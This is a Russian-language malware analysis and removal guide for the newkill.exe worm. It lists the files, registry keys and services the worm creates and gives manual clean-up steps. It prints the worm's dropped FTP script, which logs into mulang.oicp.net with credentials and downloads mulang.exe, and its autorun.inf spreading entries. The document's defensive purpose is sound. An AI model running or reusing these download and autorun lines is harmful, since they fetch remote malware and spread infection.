| English version | Распечатать |
|
*** *** |
***
Что такое newkill.exe
В последнее время активизировался и начинает распространяться новый вирус – newkill.exe.
Визуально исполняемый файл вируса – newkill.exe – обозначается иконкой, стилизованной под надкусанное яблоко с листочком и шестью лучами (то ли это стилизация под логотип Apple, то ли этим показано, что вирус создан фанатом Apple и предназначен для ОС Windows).
Исполняемый файл вируса упакован Aspack'ом.
Вирус предназначен для 32-битной платформы ОС Windows с процессором x86.
Родина вируса – Китай.
Примерная дата появления вируса – начало 2008 г. (автор статьи обнаружил первый вирус newkill.exe 24 февраля 2008 г.).
Этимология названия
Судя по всему, название newkill образовано от сокращения фразы new killer – новый убийца (претенциозное название!).
Деструктивные действия вируса:
– при запуске/автозапуске вируса в корневую директорию заражаемого диска копируются файлы autorun.inf и newkill.exe (553КБ);
– в папке \WINDOWS вирус создает скрытый файл getfile.cmd (18 байт) с содержимым: ftp -s:ftp32.dat;
– в папке \WINDOWS вирус создает скрытый файл ftp32.dat (82 байт) с содержимым:
open mulang.oicp.net
chiyiming
3813372
cd mulang
binary
get mulang.exe
bye
– в папке \WINDOWS вирус создает скрытый файл instsrv.exe (37,0КБ);
– в папке \WINDOWS вирус создает скрытый файл killcopy.exe (553КБ);
– в папке \WINDOWS вирус создает скрытый файл srvany.exe (13,0КБ);
– в папке \Temp\ вирус создает папку E_4, содержащую файл krnln.fnr (1,05МБ);
– вирус включает протокол TCPv6, используя системную утилиту настройки IPv6 (\WINDOWS\system32\ipv6.exe; включается командой ipv6 install); после этого в составе автоматически стартующих системных служб появляется IPv6;
– используя службу IPv6, с помощью файла ftp32.dat вирус создает на ПК ftp-сервер и, если соединение с Интернетом открыто, пытается загрузить с китайских сайтов mulang.oicp.net и dl.pconline.com.cn файл mulang.exe;
– файлы killcopy.exe и srvany.exe стартуют автоматически при запуске ОС и постоянно присутствуют в оперативной памяти;
– файлы newkill.exe и killcopy.exe копируется и в папку \WINDOWS\system32;
– некоторые разновидности вируса копируют в папку \WINDOWS\system32 файлы caot082.exe, internet.exe, Logo1_.exe, newkill.scr, systemtray.exe;
– при открытии/подключении локальных/съёмных дисков вирус копируется на незаражённые носители;
– вирус производит скрытый вызов следующих dll-библиотек:
· kernel32.dll (Библиотека клиента Windows NT Base API), которая, в свою очередь, подгружает ntdll.dll (Системная библиотека NT);
· user32.dll (Библиотека клиента USER API Windows), которая, в свою очередь, подгружает advapi32.dll (Расширенная библиотека API Windows 32), gdi32.dll (GDI Client DLL), msimg32.dll (GDIEXT Client DLL), powrprof.dll (Power Profile Helper DLL), winsta.dll (Winstation Library);
– …
Примерное содержимое файла autorun.inf:
[AutoRun]
open=newkill.exe
shellexecute=newkill.exe
shell\ґтїЄ(·А¶ѕДЈКЅ)\command=newkill.exe
shell=ґтїЄ(·А¶ѕДЈКЅ)
Как уничтожить newkill
Вопреки заверениям разработчиков антивирусов, ни один антивирус не устранит последствия вирусной атаки, – это нужно сделать вручную!
Антивирусы McAfee, Norman, Symantec, Trend Micro до сих пор не могут идентифицировать вирус newkill.
Как ликвидировать newkill вручную и устранить последствия вирусной атаки
1. Запустите Диспетчер задач Windows (любым способом – или с помощью Ctrl+Alt+Del, или с помощью Пуск –> Выполнить… –> taskmgr –> OK);
– выгрузите из памяти файлы newkill.exe, killcopy.exe и srvany.exe.
2. Поскольку у файлов вируса установлены атрибуты Скрытый, Системный, Только для чтения, чтобы найти их и уничтожить:
– откройте Мой компьютер, выберите меню Сервис –> Свойства папки… (или нажмите Пуск –> Настройка –> Панель управления –> Свойства папки);
– в открывшемся диалоговом окне Свойства папки откройте вкладку Вид;
– в разделе Дополнительные параметры установите флажок Отображать содержимое системных папок, снимите флажок Скрывать защищенные системные файлы, установите переключатель Показывать скрытые файлы и папки –> OK.
3. Последовательно откройте локальные и съёмные диски, найдите и удалите файлы newkill.exe, killcopy.exe и autorun.inf в корневых папках дисков;
– в папках \WINDOWS и \WINDOWS\system32 удалите файлы newkill.exe, killcopy.exe, srvany.exe, getfile.cmd, ftp32.dat, instsrv.exe, mulang.exe, caot082.exe, internet.exe, Logo1_.exe, newkill.scr, systemtray.exe;
– в папке \Temp\ удалите файл krnln.fnr.
4. Нажмите Пуск –> Выполнить… –> в поле Открыть введите regedit –> OK;
– раскройте ветвь [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon], проверьте значение строкового (REG_SZ) параметра Shell (должно быть Explorer.exe);
– проверьте значение строкового (REG_SZ) параметра Userinit, – должно быть C:\Windows\system32\userinit.exe, (если система установлена на диске C:\, если на другом диске, то <буква_диска>:\Windows\system32\userinit.exe,);
– раскройте раздел [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]. Если он содержит подразделы newkill и killcopy, удалите эти подразделы;
– раскройте раздел [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]. Если он содержит строковый (REG_SZ) параметр C:\WINDOWS\System32\newkill.exe, – удалите его;
– в разделах [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TCPv6] и [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\TCPv6] удалите расширяемые строковые (REG_EXPAND_SZ) параметры ImagePath со значением C:\WINDOWS\srvany.exe;
– в разделах [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TCPv6\Parameters] и [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\TCPv6\Parameters] удалите строковые (REG_SZ) параметры Application со значением C:\WINDOWS\killcopy.exe;
– выберите меню Правка –> Найти…;
– в открывшемся окне Поиск в текстовое поле Найти введите newkill, нажмите Найти далее;
– найденный параметр, содержащий ссылку на файл newkill, удалите;
– нажимайте F3, пока не появится окно с сообщением Поиск в реестре завершен;
– также найдите и удалите все параметры, содержащие ссылки на файлы srvany и killcopy;
– закройте Редактор реестра.
5. Перерегистрируйте (с помощью Сервера регистрации regsvr32.exe) Общую библиотеку оболочки Windows shell32.dll:
– нажмите Пуск –> Выполнить… –> в поле Открыть введите regsvr32 /i shell32.dll –> OK;
– появится окно RegSvr32 с сообщением «DllRegisterServer and DllInstall в shell32.dll завершено успешно», нажмите OK.
6. Если вы не используете протокол TCPv6, отключите его:
– нажмите Пуск –> Настройка –> Панель управления –> Администрирование –> Службы (или Пуск –> Выполнить… –> в выпадающем списке Открыть диалогового окна Запуск программы введите services.msc –> OK);
– в диалоговом окне Службы найдите службу TCPv6;
– щелкните Остановить службу;
– двойным щелчком вызовите окно TCPv6 – свойства;
– на вкладке Общие в выпадающем списке Тип запуска выберите Отключено –> OK.
Примечания
1. Внимание! Будьте осторожны при манипуляциях с Реестром! Некорректное использование Редактора реестра может привести к возникновению серьёзных неполадок, вплоть до переустановки операционной системы!
2. Помните, что предупредить легче, чем лечить! Пользуйтесь брандмауэрами и надёжными антивирусными программами с регулярно (не менее одного раза в неделю!) обновляемыми базами.
3. Если вы не можете запустить Диспетчер задач, см. Что делать, если появляется сообщение «Диспетчер задач отключен администратором»?
4. Если пункт меню Свойства папки недоступен, см. Что делать, если недоступен пункт меню «Свойства папки»?
5. Если вы не можете запустить Редактор реестра Windows, см. Что делать, если появляется сообщение «Редактирование реестра запрещено администратором системы»?
6. Если вы не можете открыть флешку, см. Что делать, если после лечения от вирусов не открывается флешка?
7. Не полагайтесь на антивирусный монитор: всегда перед копированием и открытием проверяйте антивирусным сканером все исполняемые файлы и документы (особенно файлы на дискетах, флешках, компакт-дисках, полученные по Интернету).
8. См. Как устранить последствия вирусной атаки?
9. См. Windows: как отобразить скрытые файлы и папки?
Валерий Сидоров
***
• Дело о…
• Apple = iСтив + iPod + iPhone + iPad + iTunes + iMac + …
• Apps for iPad, iPhone, iPod touch…